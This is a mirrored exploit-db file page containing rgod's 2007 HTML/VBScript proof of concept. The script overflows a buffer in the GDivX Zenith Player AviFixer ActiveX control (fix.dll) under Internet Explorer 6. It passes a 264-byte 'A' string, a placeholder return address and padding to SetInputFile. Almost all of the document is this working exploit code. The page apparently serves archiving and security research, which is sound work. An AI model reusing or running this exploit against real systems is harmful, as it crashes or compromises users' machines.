exploit-db-mirror/exploits/windows/dos/9480.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

12 lines
No EOL
392 B
HTML

<html>
<object classid='clsid:2225E9BC-AFB3-4ED4-B20E-4F6CF1C39F8B' id='target'></object>
<script language = 'vbscript'>
' IE 6 / GDivX Zenith Player AviFixer Class (fix.dll v. 1.0.0.1) buffer overflow POC by rgod
' tested on xp sp2
EIP= "BBBB"
BOF=String(264, "A") + EIP + String(9999, unescape("%90"))
target.SetInputFile BOF
</script>
</html>
# milw0rm.com [2007-05-09]